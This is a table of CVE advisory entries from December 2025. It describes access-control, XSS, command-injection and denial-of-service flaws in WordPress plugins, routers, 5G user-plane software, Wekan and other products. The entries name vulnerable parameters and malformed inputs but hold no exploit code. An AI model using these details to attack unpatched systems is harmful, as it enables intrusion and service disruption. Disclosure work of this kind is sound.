| Auctollo--Google XML Sitemaps | Missing Authorization vulnerability in Auctollo Google XML Sitemaps google-sitemap-generator allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Google XML Sitemaps: from n/a through <= 4.1.21. | 2025-12-16 | not yet calculated | CVE-2025-64632 | https://vdp.patchstack.com/database/Wordpress/Plugin/google-sitemap-generator/vulnerability/wordpress-google-xml-sitemaps-plugin-4-1-21-broken-access-control-vulnerability?_s_id=cve |
| colabrio--Norebro Extra | Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in colabrio Norebro Extra norebro-extra allows Code Injection. This issue affects Norebro Extra: from n/a through <= 1.6.8. | 2025-12-16 | not yet calculated | CVE-2025-64633 | https://vdp.patchstack.com/database/Wordpress/Plugin/norebro-extra/vulnerability/wordpress-norebro-extra-plugin-1-6-8-content-injection-vulnerability?_s_id=cve |
| ThemeFusion--Avada | Missing Authorization vulnerability in ThemeFusion Avada avada allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Avada: from n/a through <= 7.13.1. | 2025-12-16 | not yet calculated | CVE-2025-64634 | https://vdp.patchstack.com/database/Wordpress/Theme/avada/vulnerability/wordpress-avada-theme-7-13-1-broken-access-control-vulnerability?_s_id=cve |
| Syed Balkhi--Feeds for YouTube | Missing Authorization vulnerability in Syed Balkhi Feeds for YouTube feeds-for-youtube allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Feeds for YouTube: from n/a through <= 2.4.0. | 2025-12-16 | not yet calculated | CVE-2025-64635 | https://vdp.patchstack.com/database/Wordpress/Plugin/feeds-for-youtube/vulnerability/wordpress-feeds-for-youtube-plugin-2-4-0-broken-access-control-vulnerability?_s_id=cve |
| OnPay.io--OnPay.io for WooCommerce | Missing Authorization vulnerability in OnPay.io OnPay.io for WooCommerce onpay-io-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects OnPay.io for WooCommerce: from n/a through <= 1.0.47. | 2025-12-16 | not yet calculated | CVE-2025-64638 | https://vdp.patchstack.com/database/Wordpress/Plugin/onpay-io-for-woocommerce/vulnerability/wordpress-onpay-io-for-woocommerce-plugin-1-0-47-broken-access-control-vulnerability?_s_id=cve |
| WP Compress--WP Compress for MainWP | Missing Authorization vulnerability in WP Compress WP Compress for MainWP wp-compress-mainwp allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Compress for MainWP: from n/a through <= 6.50.07. | 2025-12-16 | not yet calculated | CVE-2025-64639 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-compress-mainwp/vulnerability/wordpress-wp-compress-for-mainwp-plugin-6-50-07-broken-access-control-vulnerability?_s_id=cve |
| GROWI, Inc.--GROWI | Cross-site request forgery vulnerability exists in GROWI v7.3.3 and earlier. If a user views a malicious page while logged in, the user may be tricked into performing unintended operations. | 2025-12-17 | not yet calculated | CVE-2025-64700 | https://growi.co.jp/news/40/ https://jvn.jp/en/jp/JVN55745775/ |
| arduino--arduino-ide | Arduino IDE is an integrated development environment. Prior to version 2.3.7, Arduino IDE for macOS was configured with overly permissive security entitlements that could bypass macOS Hardened Runtime protections. This configuration allows attackers to inject malicious dynamic libraries into the application process, gaining access to all TCC (Transparency, Consent, and Control) permissions granted to the application. The fix is included starting from the `2.3.7` release. | 2025-12-18 | not yet calculated | CVE-2025-64723 | https://github.com/arduino/arduino-ide/security/advisories/GHSA-vf5j-xhwq-8vqj https://github.com/arduino/arduino-ide/pull/2805/commits/2f7667136ee95ce07dde23c49d2de526b45e3293 https://github.com/arduino/arduino-ide/releases/tag/2.3.7 https://support.arduino.cc/hc/en-us/articles/24329484618652-ASEC-25-004-Arduino-IDE-v2-3-7-Resolves-Multiple-Vulnerabilities |
| arduino--arduino-ide | Arduino IDE is an integrated development environment. Prior to version 2.3.7, Arduino IDE for macOS is installed with world-writable file permissions on sensitive application components, allowing any local user to replace legitimate files with malicious code. When another user launches the application, the malicious code executes with that user's privileges, enabling privilege escalation and unauthorized access to sensitive data. The fix is included starting from the `2.3.7` release. | 2025-12-18 | not yet calculated | CVE-2025-64724 | https://github.com/arduino/arduino-ide/security/advisories/GHSA-3fvj-pgqw-fgw6 https://github.com/arduino/arduino-ide/pull/2805/commits/5d282f38496e96dcba02818536c0835bd684ec98 https://github.com/arduino/arduino-ide/releases/tag/2.3.7 https://support.arduino.cc/hc/en-us/articles/24329484618652-ASEC-25-004-Arduino-IDE-v2-3-7-Resolves-Multiple-Vulnerabilities |
| WeblateOrg--weblate | Weblate is a web based localization tool. In versions prior to 5.15, it was possible to accept an invitation opened by a different user. Version 5.15 contains a patch. As a workaround, avoid leaving one's Weblate sessions with an invitation opened unattended. | 2025-12-15 | not yet calculated | CVE-2025-64725 | https://github.com/WeblateOrg/weblate/security/advisories/GHSA-m6hq-f4w9-qrjj https://github.com/WeblateOrg/weblate/pull/16913 https://github.com/WeblateOrg/weblate/commit/02e904675f0608a6bbfbf9466eeccd9d022591e9 https://github.com/WeblateOrg/weblate/releases/tag/weblate-5.15 |
| Checkmk GmbH--Checkmk | Insufficient permission validation in Checkmk versions prior to 2.4.0p17 and 2.3.0p42 allows low-privileged users to view agent information via the REST API, which could lead to information disclosure. | 2025-12-18 | not yet calculated | CVE-2025-64997 | https://checkmk.com/werk/18681 |
| Checkmk GmbH--Checkmk | SSH private keys of the "Remote alert handlers (Linux)" rule were exposed in the rule page's HTML source in Checkmk <= 2.4.0p18 and all versions of Checkmk 2.3.0. This potentially allowed unauthorized triggering of predefined alert handlers on hosts where the handler was deployed. | 2025-12-18 | not yet calculated | CVE-2025-65000 | https://checkmk.com/werk/19030 |
| WODESYS--WD-R608U | In the WODESYS WD-R608U router (also known as WDR122B V2.0 and WDR28), due to a lack of authentication in the configuration change module of the adm.cgi endpoint, an unauthenticated attacker can execute commands including backup creation, device restart and resetting the device to factory settings. The vendor was notified early about this vulnerability but did not respond with details of the vulnerability or the vulnerable version range. Only version WDR28081123OV1.01 was tested and confirmed as vulnerable; other versions were not tested and might also be vulnerable. | 2025-12-18 | not yet calculated | CVE-2025-65007 | http://www.wodesys.com/eproductms52.html https://cert.pl/en/posts/2025/12/CVE-2025-65007 https://github.com/wcyb/security_research |
| WODESYS--WD-R608U | In the WODESYS WD-R608U router (also known as WDR122B V2.0 and WDR28), due to a lack of validation of the langGet parameter in the adm.cgi endpoint, a malicious attacker can execute system shell commands. The vendor was notified early about this vulnerability but did not respond with details of the vulnerability or the vulnerable version range. Only version WDR28081123OV1.01 was tested and confirmed as vulnerable; other versions were not tested and might also be vulnerable. | 2025-12-18 | not yet calculated | CVE-2025-65008 | http://www.wodesys.com/eproductms52.html https://cert.pl/en/posts/2025/12/CVE-2025-65007 https://github.com/wcyb/security_research |
| WODESYS--WD-R608U | In the WODESYS WD-R608U router (also known as WDR122B V2.0 and WDR28), the admin password is stored in a configuration file as plaintext and can be obtained by an unauthorized user through direct reference to the resource in question. The vendor was notified early about this vulnerability but did not respond with details of the vulnerability or the vulnerable version range. Only version WDR28081123OV1.01 was tested and confirmed as vulnerable; other versions were not tested and might also be vulnerable. | 2025-12-18 | not yet calculated | CVE-2025-65009 | http://www.wodesys.com/eproductms52.html https://cert.pl/en/posts/2025/12/CVE-2025-65007 https://github.com/wcyb/security_research |
| WODESYS--WD-R608U | The WODESYS WD-R608U router (also known as WDR122B V2.0 and WDR28) is vulnerable to Broken Access Control in the initial configuration wizard.cgi endpoint. A malicious attacker can change the admin panel password without authorization. The vulnerability can also be exploited after the initial configuration has been set. The vendor was notified early about this vulnerability but did not respond with details of the vulnerability or the vulnerable version range. Only version WDR28081123OV1.01 was tested and confirmed as vulnerable; other versions were not tested and might also be vulnerable. | 2025-12-18 | not yet calculated | CVE-2025-65010 | http://www.wodesys.com/eproductms52.html https://cert.pl/posts/2025/12/CVE-2025-65007 https://github.com/wcyb/security_research |
| WODESYS--WD-R608U | In the WODESYS WD-R608U router (also known as WDR122B V2.0 and WDR28), an unauthorised user can view configuration files by directly referencing the resource in question. The vendor was notified early about this vulnerability but did not respond with details of the vulnerability or the vulnerable version range. Only version WDR28081123OV1.01 was tested and confirmed as vulnerable; other versions were not tested and might also be vulnerable. | 2025-12-18 | not yet calculated | CVE-2025-65011 | http://www.wodesys.com/eproductms52.html https://cert.pl/posts/2025/12/CVE-2025-65007 https://github.com/wcyb/security_research |
| WaveStore--WaveStore Server | The WaveView client allows users to execute a restricted set of predefined commands and scripts on the connected WaveStore Server. A malicious attacker with high privileges is able to execute arbitrary OS commands on the server using path traversal in the showerr script. This issue was fixed in version 6.44.44. | 2025-12-16 | not yet calculated | CVE-2025-65074 | https://cert.pl/en/posts/2025/12/CVE-2025-65074 https://www.wavestore.com/products/video-management-software |
| WaveStore--WaveStore Server | The WaveView client allows users to execute a restricted set of predefined commands and scripts on the connected WaveStore Server. A malicious attacker with high privileges is able to read or delete files, with the permissions of the dvr user, on the server using path traversal in the alog script. This issue was fixed in version 6.44.44. | 2025-12-16 | not yet calculated | CVE-2025-65075 | https://cert.pl/en/posts/2025/12/CVE-2025-65074 https://www.wavestore.com/products/video-management-software |
| WaveStore--WaveStore Server | The WaveView client allows users to execute a restricted set of predefined commands and scripts on the connected WaveStore Server. A malicious attacker with high privileges is able to read or delete any file on the server using path traversal in the ilog script. This script is run with root privileges. This issue was fixed in version 6.44.44. | 2025-12-16 | not yet calculated | CVE-2025-65076 | https://cert.pl/en/posts/2025/12/CVE-2025-65074 https://www.wavestore.com/products/video-management-software |
| OneAgent--OneAgent | An issue was discovered in Dynatrace OneAgent before 1.325.47. When attempting to access a remote network share from a machine where OneAgent is installed and receiving a "STATUS_LOGON_FAILURE" error, the agent will retrieve every user token on the machine and repeatedly attempt to access the network share while impersonating them. The exploitation of this vulnerability can allow an unprivileged attacker with access to the affected system to perform NTLM relay attacks. | 2025-12-15 | not yet calculated | CVE-2025-65176 | https://hackerone.com/reports/3313408 https://docs.dynatrace.com/docs/shortlink/release-notes-oneagent-sprint-325#oneagent-sprint-325-ga https://docs.dynatrace.com/docs/whats-new/oneagent/sprint-325#oneagent-sprint-325-ga |
| Entrinsik--Entrinsik | There is a username enumeration via local user login in Entrinsik Informer v5.10.1 which allows malicious users to enumerate users by entering an OTP code and new password and then reviewing application responses. | 2025-12-17 | not yet calculated | CVE-2025-65185 | http://entrinsik.com http://informer.com https://www.triaxiomsecurity.com/entrinsik-informer-username-enumeration-cve-2025-65185/ |
| KeePassXC--KeePassXC | KeePassXC-Browser through 1.9.9.2 autofills or prompts to fill stored credentials into documents rendered under a browser-enforced CSP directive and iframe attribute sandbox, allowing attacker-controlled script in the sandboxed document to access populated form fields and exfiltrate credentials. | 2025-12-17 | not yet calculated | CVE-2025-65203 | https://github.com/keepassxreboot/keepassxc-browser/issues/2647 https://github.com/keepassxreboot/keepassxc-browser/pull/2648 |
| MooreThreads--MooreThreads | MooreThreads torch_musa through all versions contains an unsafe deserialization vulnerability in torch_musa.utils.compare_tool. The compare_for_single_op() and nan_inf_track_for_single_op() functions use pickle.load() on user-controlled file paths without validation, allowing arbitrary code execution. An attacker can craft a malicious pickle file that executes arbitrary Python code when loaded, enabling remote code execution with the privileges of the victim process. | 2025-12-15 | not yet calculated | CVE-2025-65213 | https://github.com/MooreThreads/torch_musa/issues/110#issuecomment-3475809588 |
| SLiMS--SLiMS | Reflected cross-site scripting (XSS) in SLiMS (slims9_bulian) before 9.6.0 via improper handling of $_SERVER['PHP_SELF'] in index.php/sysconfig.inc.php, which allows remote attackers to execute arbitrary JavaScript in a victim's browser by supplying a crafted URL path. | 2025-12-17 | not yet calculated | CVE-2025-65233 | https://github.com/slims/slims9_bulian/issues/185 https://github.com/hbtw25/vulnerability-research/tree/main/CVE-2025-65233 |
| Canary Mail--Canary Mail | When using the attachment interaction functionality, Canary Mail 5.1.40 and below saves documents to a file system without a Mark-of-the-Web tag, which allows attackers to bypass the built-in file protection mechanisms of both Windows OS and third-party software. | 2025-12-16 | not yet calculated | CVE-2025-65318 | http://canary.com http://canarymail.com https://drive.google.com/file/d/14wrTzvcLPfFsWmy-SAtDwwZKKPssBsx5/view https://github.com/nickvourd/RTI-Toolkit https://github.com/bbaboha/CVE-2025-65318-and-CVE-2025-65319 |
| Blue Mail--Blue Mail | When using the attachment interaction functionality, Blue Mail 1.140.103 and below saves documents to a file system without a Mark-of-the-Web tag, which allows attackers to bypass the built-in file protection mechanisms of both Windows OS and third-party software. | 2025-12-16 | not yet calculated | CVE-2025-65319 | http://blue.com https://github.com/nickvourd/RTI-Toolkit https://github.com/rip1s/CVE-2017-11882 https://drive.google.com/file/d/1dVzXuHBk3B1DiFpwFYwj2NNjeKGnGSwT/view https://github.com/bbaboha/CVE-2025-65318-and-CVE-2025-65319 |
| Dbit--Dbit | An issue was discovered in the Dbit N300 T1 Pro Easy Setup Wireless Wi-Fi Router on firmware version V1.0.0: it does not implement rate limiting for /api/login, allowing attackers to brute-force password enumeration. | 2025-12-16 | not yet calculated | CVE-2025-65427 | http://shenzhen.com http://dbit.com https://github.com/kirubel-cve/CVE-2025-65427 |
| allauth-django--allauth-django | An issue was discovered in allauth-django before 65.13.0. IdP: marking a user as is_active=False after having handed out tokens for that user while the account was still active had no effect. Fixed: the access/refresh tokens are now rejected. | 2025-12-15 | not yet calculated | CVE-2025-65430 | https://allauth.org/news/2025/10/django-allauth-65.13.0-released/ |
| allauth-django--allauth-django | An issue was discovered in allauth-django before 65.13.0. Both Okta and NetIQ were using preferred_username as the identifier for third-party provider accounts. That value may be mutable and should therefore be avoided for authorization decisions. The providers are now using sub instead. | 2025-12-15 | not yet calculated | CVE-2025-65431 | https://allauth.org/news/2025/10/django-allauth-65.13.0-released/ |
| Open5GS--Open5GS | An issue was discovered in Open5GS 2.7.5-49-g465e90f, when processing a PFCP Session Establishment Request (type=50), the UPF crashes with a reachable assertion in `lib/pfcp/context.c` (`ogs_pfcp_object_teid_hash_set`) if the CreatePDR→PDI→F-TEID has CH=1 and the F-TEID address-family flag(s) (IPv4/IPv6) do not match the GTP-U resource family configured for the selected DNN (Network Instance), resulting in a denial of service. | 2025-12-18 | not yet calculated | CVE-2025-65559 | https://github.com/open5gs/open5gs/issues/4135 |
| LocalNode.Sess--LocalNode.Sess | An issue was discovered in function LocalNode.Sess in free5GC 4.1.0 allowing attackers to cause a denial of service or other unspecified impacts via crafted header Local SEID to the PFCP Session Modification Request. | 2025-12-18 | not yet calculated | CVE-2025-65561 | https://github.com/free5gc/free5gc/issues/730 https://github.com/free5gc/go-upf/pull/80 |
| Free5GC--Free5GC | The free5GC UPF suffers from a lack of bounds checking on the SEID when processing PFCP Session Deletion Requests. An unauthenticated remote attacker can send a request with a very large SEID (e.g., 0xFFFFFFFFFFFFFFFF) that causes an integer conversion/underflow in LocalNode.DeleteSess() / LocalNode.Sess() when a uint64 SEID is converted to int and used in index arithmetic. This leads to a negative index into n.sess and a Go runtime panic, resulting in a denial of service (UPF crash). The issue has been reproduced on free5GC v4.1.0 with crashes observed in the session lookup/deletion path in internal/pfcp/node.go; other versions may also be affected. No authentication is required. | 2025-12-18 | not yet calculated | CVE-2025-65562 | https://github.com/free5gc/free5gc/issues/731 |
| omec-project--omec-project | A denial-of-service vulnerability exists in the omec-project UPF (component upf-epc/pfcpiface) up to at least version upf-epc-pfcpiface:2.1.3-dev. When the UPF receives a PFCP Association Setup Request that is missing the mandatory NodeID Information Element, the association setup handler dereferences a nil pointer instead of validating the message, causing a panic and terminating the UPF process. An attacker who can send PFCP Association Setup Request messages to the UPF's N4/PFCP endpoint can exploit this issue to repeatedly crash the UPF and disrupt user-plane services. | 2025-12-18 | not yet calculated | CVE-2025-65563 | https://github.com/omec-project/upf/issues/955 https://github.com/omec-project/upf/pull/963 |
| omec-project--omec-project | A denial-of-service vulnerability exists in the omec-upf (upf-epc-pfcpiface) in version upf-epc-pfcpiface:2.1.3-dev. When the UPF receives a PFCP Association Setup Request that is missing the mandatory Recovery Time Stamp Information Element, the association setup handler dereferences a nil pointer via IE.RecoveryTimeStamp() instead of validating the message. This results in a panic and terminates the UPF process. An attacker who can send PFCP Association Setup Request messages to the UPF's N4/PFCP endpoint can exploit this issue to repeatedly crash the UPF and disrupt user-plane services. | 2025-12-18 | not yet calculated | CVE-2025-65564 | https://github.com/omec-project/upf/issues/956 https://github.com/omec-project/upf/pull/964 |
| omec-project--omec-project | A denial-of-service vulnerability exists in the omec-project UPF (pfcpiface component) in version upf-epc-pfcpiface:2.1.3-dev. After PFCP association is established, a PFCP Session Establishment Request that is missing the mandatory F-SEID (CPF-SEID) Information Element is not properly validated. The session establishment handler calls IE.FSEID() on a nil pointer, which triggers a panic and terminates the UPF process. An attacker who can send PFCP Session Establishment Request messages to the UPF's N4/PFCP endpoint can exploit this issue to repeatedly crash the UPF and disrupt user-plane services. | 2025-12-18 | not yet calculated | CVE-2025-65565 | https://github.com/omec-project/upf/issues/957 |
| omec-project--omec-project | A denial-of-service vulnerability exists in the omec-project UPF (pfcpiface component) in version upf-epc-pfcpiface:2.1.3-dev. When the UPF receives a PFCP Session Report Response that is missing the mandatory Cause Information Element, the session report handler dereferences a nil pointer instead of rejecting the malformed message. This triggers a panic and terminates the UPF process. An attacker who can send PFCP Session Report Response messages to the UPF's N4/PFCP endpoint can exploit this flaw to repeatedly crash the UPF and disrupt user-plane services. | 2025-12-18 | not yet calculated | CVE-2025-65566 | https://github.com/omec-project/upf/issues/958 |
| omec-project--omec-project | A denial-of-service vulnerability exists in the omec-project UPF (pfcpiface component) in version upf-epc-pfcpiface:2.1.3-dev. After PFCP association, a specially crafted PFCP Session Establishment Request with a CreatePDR that contains a malformed Flow-Description is not robustly validated. The Flow-Description parser (parseFlowDesc) can read beyond the bounds of the provided buffer, causing a panic and terminating the UPF process. An attacker who can send PFCP Session Establishment Request messages to the UPF's N4/PFCP endpoint can exploit this issue to repeatedly crash the UPF. | 2025-12-18 | not yet calculated | CVE-2025-65567 | https://github.com/omec-project/upf/issues/959 |
| omec-project--omec-project | A denial-of-service vulnerability exists in the omec-project UPF (pfcpiface component) in version upf-epc-pfcpiface:2.1.3-dev. After PFCP association, a PFCP Session Establishment Request that includes a CreateFAR with an empty or truncated IPv4 address field is not properly validated. During parsing, parseFAR() calls ip2int(), which performs an out-of-bounds read on the IPv4 address buffer and triggers an index-out-of-range panic. An attacker who can send PFCP Session Establishment Request messages to the UPF's N4/PFCP endpoint can exploit this issue to repeatedly crash the UPF and disrupt user-plane services. | 2025-12-18 | not yet calculated | CVE-2025-65568 | http://omec-projectupf.com http://upf-epc-pfcpiface.com https://github.com/omec-project/upf/issues/962 |
| Volosoft--Volosoft | An open redirect vulnerability exists in the Account module in Volosoft ABP Framework >= 5.1.0 and < 10.0.0-rc.2. Improper validation of the returnUrl parameter in the register function allows an attacker to redirect users to arbitrary external domains. | 2025-12-16 | not yet calculated | CVE-2025-65581 | https://github.com/abpframework/abp/commit/a01adc58464d278ca817c4bbb6cbce30f155d0d1 https://github.com/abpframework/abp/commit/44a2dc14e933f3ce1ca93f9313d836694ab77d1d |
| nopCommerce--nopCommerce | nopCommerce 4.90.0 is vulnerable to Cross Site Scripting (XSS) via the Attributes functionality. | 2025-12-16 | not yet calculated | CVE-2025-65589 | https://www.nopcommerce.com/ https://seclists.org/fulldisclosure/2025/Dec/16 |
| nopCommerce--nopCommerce | nopCommerce 4.90.0 is vulnerable to Cross Site Scripting (XSS) via the Blog posts functionality in the Content Management area. | 2025-12-16 | not yet calculated | CVE-2025-65590 | https://www.nopcommerce.com/ https://seclists.org/fulldisclosure/2025/Dec/17 |
| nopCommerce--nopCommerce | nopCommerce 4.90.0 is vulnerable to Cross Site Scripting (XSS) via the Currencies functionality. | 2025-12-16 | not yet calculated | CVE-2025-65591 | https://www.nopcommerce.com/ https://seclists.org/fulldisclosure/2025/Dec/18 |
| nopCommerce--nopCommerce | nopCommerce 4.90.0 is vulnerable to Cross Site Scripting (XSS) in the product management functionality. Malicious payloads inserted into the "Product Name" and "Short Description" fields are stored in the backend database and executed automatically whenever a user views the affected pages. | 2025-12-16 | not yet calculated | CVE-2025-65592 | https://www.nopcommerce.com/ https://seclists.org/fulldisclosure/2025/Dec/19 |
| nopCommerce--nopCommerce | nopCommerce 4.90.0 is vulnerable to Cross Site Request Forgery (CSRF) via the Schedule Tasks functionality. | 2025-12-16 | not yet calculated | CVE-2025-65593 | https://www.nopcommerce.com/ https://seclists.org/fulldisclosure/2025/Dec/20 |
| OmniDocs--OmniDocs | An unauthenticated Broken Function Level Authorization (BFLA) vulnerability in Newgen OmniDocs v11.0 allows attackers to obtain sensitive information and execute a full account takeover via a crafted API request. | 2025-12-15 | not yet calculated | CVE-2025-65742 | https://newgensoft.com/ https://github.com/CBx216/CVE-2025-65742-Newgen-OmniDocs-LDAP-BFLA/blob/main/CVE-2025-65742.md |
| Wekan--Wekan | An issue was discovered in Wekan The Open Source kanban board system up to version 18.15, fixed in 18.16. Uploaded attachments can be served with attacker-controlled Content-Type (text/html), allowing execution of attacker-supplied HTML/JS in the application's origin and enabling session/token theft and CSRF actions. | 2025-12-15 | not yet calculated | CVE-2025-65778 | https://github.com/wekan/wekan https://wekan.fi/hall-of-fame/spacebleed/ https://github.com/wekan/wekan/commit/e9a727301d7b4f1689a703503df668c0f4f4cab8 https://github.com/wekan/wekan/blob/main/CHANGELOG.md#v816-2025-11-02-wekan--release |
| Wekan--Wekan | An issue was discovered in Wekan The Open Source kanban board system up to version 18.15, fixed in 18.16. Unauthenticated attackers can update a board's "sort" value (Boards.allow returns true without verifying userId), allowing arbitrary reordering of boards. | 2025-12-15 | not yet calculated | CVE-2025-65779 | https://github.com/wekan/wekan https://wekan.fi/hall-of-fame/spacebleed/ https://github.com/wekan/wekan/blob/main/CHANGELOG.md#v816-2025-11-02-wekan--release https://github.com/wekan/wekan/commit/ea310d7508b344512e5de0dfbc9bdfd38145c5c5 |
| Wekan--Wekan | An issue was discovered in Wekan The Open Source kanban board system up to version 18.15, fixed in 18.16. Authenticated users can update their entire user document (beyond profile fields), including orgs/teams and loginDisabled, due to missing server-side authorization checks; this enables privilege escalation and unauthorized access to other teams/orgs. | 2025-12-15 | not yet calculated | CVE-2025-65780 | https://github.com/wekan/wekan https://wekan.fi/hall-of-fame/spacebleed/ https://github.com/wekan/wekan/blob/main/CHANGELOG.md#v816-2025-11-02-wekan--release https://github.com/wekan/wekan/commit/f26d58201855e861bab1cd1fda4d62c664efdb81 |
| Wekan--Wekan | An issue was discovered in Wekan The Open Source kanban board system up to version 18.15, fixed in 18.16. Attachment upload API treats the Authorization bearer value as a userId and enters a non-terminating body-handling branch for any non-empty bearer token, enabling trivial application-layer DoS and latent identity-spoofing. | 2025-12-15 | not yet calculated | CVE-2025-65781 | https://github.com/wekan/wekan https://wekan.fi/hall-of-fame/spacebleed/ https://github.com/wekan/wekan/blob/main/CHANGELOG.md#v816-2025-11-02-wekan--release https://github.com/wekan/wekan/commit/ccd90343394f433b287733ad0a33c08e0a71f53c |
| Wekan--Wekan | An issue was discovered in Wekan The Open Source kanban board system up to version 18.15, fixed in 18.16. Authorization flaw in card update handling allows board members (and potentially other authenticated users) to add/remove arbitrary user IDs in vote.positive / vote.negative arrays, enabling vote forgery and unauthorized voting. | 2025-12-15 | not yet calculated | CVE-2025-65782 | https://github.com/wekan/wekan https://wekan.fi/hall-of-fame/spacebleed/ https://github.com/wekan/wekan/blob/main/CHANGELOG.md#v816-2025-11-02-wekan--release https://github.com/wekan/wekan/commit/0a1a075f3153e71d9a858576f1c68d2925230d9c |
| Meltytech--Meltytech | Meltytech Shotcut 25.10.31 is vulnerable to Buffer Overflow. A memory access violation occurs when processing MLT project files with manipulated width and height parameters. By setting these values to extremely large numbers, the application attempts to allocate excessive memory during image processing, triggering a buffer overflow in the mlt_image_fill_white function. | 2025-12-16 | not yet calculated | CVE-2025-65834 | https://sourceforge.net/projects/shotcut/files/v25.10.31/shotcut-macos-25.10.31.dmg/download https://bytescan.net/CVE/cve-2025-65834.html |
| Cordova--Cordova | The Cordova plugin cordova-plugin-x-socialsharing (SocialSharing-PhoneGap-Plugin) for Android 6.0.4, registers an exported broadcast receiver nl.xservices.plugins.ShareChooserPendingIntent with an android.intent.action.SEND intent filter. The onReceive implementation accesses Intent.EXTRA_CHOSEN_COMPONENT without checking for null. If a broadcast is sent with extras present but without EXTRA_CHOSEN_COMPONENT, the code dereferences a null value and throws a NullPointerException. Because the receiver is exported and performs no permission or caller validation, any local application on the device can send crafted ACTION_SEND broadcasts to this component and repeatedly crash the host application, resulting in a local, unauthenticated application-level denial of service for any app that includes the plugin. | 2025-12-15 | not yet calculated | CVE-2025-65835 | https://github.com/EddyVerbruggen/SocialSharing-PhoneGap-Plugin https://www.npmjs.com/package/cordova-plugin-x-socialsharing https://medium.com/@lcrawfqrd/local-dos-via-exported-receivers-f6b1da10d3b7 |
| Netun--Netun | The OTA firmware update mechanism in Netun Solutions HelpFlash IoT (firmware v18_178_221102_ASCII_PRO_1R5_50) uses hard-coded WiFi credentials identical across all devices and does not authenticate update servers or validate firmware signatures. An attacker with brief physical access can activate OTA mode (8-second button press), create a malicious WiFi AP using the known credentials, and serve malicious firmware via unauthenticated HTTP to achieve arbitrary code execution on this safety-critical emergency signaling device. | 2025-12-17 | not yet calculated | CVE-2025-65855 | https://docs.espressif.com/projects/esp-idf/en/v4.3.2/ https://luismirandaacebedo.github.io/CVE-2025-65855/ |
| ThimPress--LearnPress | Missing Authorization vulnerability in ThimPress LearnPress learnpress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects LearnPress: from n/a through <= 4.2.9.4. | 2025-12-18 | not yet calculated | CVE-2025-66054 | https://vdp.patchstack.com/database/Wordpress/Plugin/learnpress/vulnerability/wordpress-learnpress-plugin-4-2-9-4-broken-access-control-vulnerability?_s_id=cve |
| InstaWP--InstaWP Connect | Missing Authorization vulnerability in InstaWP InstaWP Connect instawp-connect allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects InstaWP Connect: from n/a through <= 0.1.1.9. | 2025-12-18 | not yet calculated | CVE-2025-66068 | https://vdp.patchstack.com/database/Wordpress/Plugin/instawp-connect/vulnerability/wordpress-instawp-connect-plugin-0-1-1-9-broken-access-control-vulnerability?_s_id=cve |
| Tomdever--wpForo Forum | Missing Authorization vulnerability in Tomdever wpForo Forum wpforo allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects wpForo Forum: from n/a through <= 2.4.10. | 2025-12-18 | not yet calculated | CVE-2025-66070 | https://vdp.patchstack.com/database/Wordpress/Plugin/wpforo/vulnerability/wordpress-wpforo-forum-plugin-2-4-10-broken-access-control-vulnerability?_s_id=cve |
| Cozmoslabs--WP Webhooks | Unrestricted Upload of File with Dangerous Type vulnerability in Cozmoslabs WP Webhooks wp-webhooks allows Path Traversal.This issue affects WP Webhooks: from n/a through <= 3.3.8. | 2025-12-18 | not yet calculated | CVE-2025-66074 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-webhooks/vulnerability/wordpress-wp-webhooks-plugin-3-3-8-arbitrary-file-upload-vulnerability?_s_id=cve |
| jetmonsters--Hotel Booking Lite | Improper Control of Generation of Code ('Code Injection') vulnerability in jetmonsters Hotel Booking Lite motopress-hotel-booking-lite allows Remote Code Inclusion.This issue affects Hotel Booking Lite: from n/a through <= 5.2.3. | 2025-12-18 | not yet calculated | CVE-2025-66078 | https://vdp.patchstack.com/database/Wordpress/Plugin/motopress-hotel-booking-lite/vulnerability/wordpress-hotel-booking-lite-plugin-5-2-3-remote-code-execution-rce-vulnerability?_s_id=cve |
| Property Hive--PropertyHive | Missing Authorization vulnerability in Property Hive PropertyHive propertyhive allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PropertyHive: from n/a through <= 2.1.12. | 2025-12-18 | not yet calculated | CVE-2025-66088 | https://vdp.patchstack.com/database/Wordpress/Plugin/propertyhive/vulnerability/wordpress-propertyhive-plugin-2-1-12-broken-access-control-vulnerability-2?_s_id=cve |
| Magnigenie--RestroPress | Missing Authorization vulnerability in Magnigenie RestroPress restropress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects RestroPress: from n/a through <= 3.2.3.5. | 2025-12-18 | not yet calculated | CVE-2025-66100 | https://vdp.patchstack.com/database/Wordpress/Plugin/restropress/vulnerability/wordpress-restropress-plugin-3-2-3-5-broken-access-control-vulnerability?_s_id=cve |
| FolioVision--FV Antispam | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FolioVision FV Antispam fv-antispam allows Reflected XSS.This issue affects FV Antispam: from n/a through <= 2.7. | 2025-12-18 | not yet calculated | CVE-2025-66102 | https://vdp.patchstack.com/database/Wordpress/Plugin/fv-antispam/vulnerability/wordpress-fv-antispam-plugin-2-7-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Anton Vanyukov--Offload, AI & Optimize with Cloudflare Images | Missing Authorization vulnerability in Anton Vanyukov Offload, AI & Optimize with Cloudflare Images cf-images allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Offload, AI & Optimize with Cloudflare Images: from n/a through <= 1.9.5. | 2025-12-18 | not yet calculated | CVE-2025-66104 | https://vdp.patchstack.com/database/Wordpress/Plugin/cf-images/vulnerability/wordpress-offload-ai-optimize-with-cloudflare-images-plugin-1-9-5-broken-access-control-vulnerability?_s_id=cve |
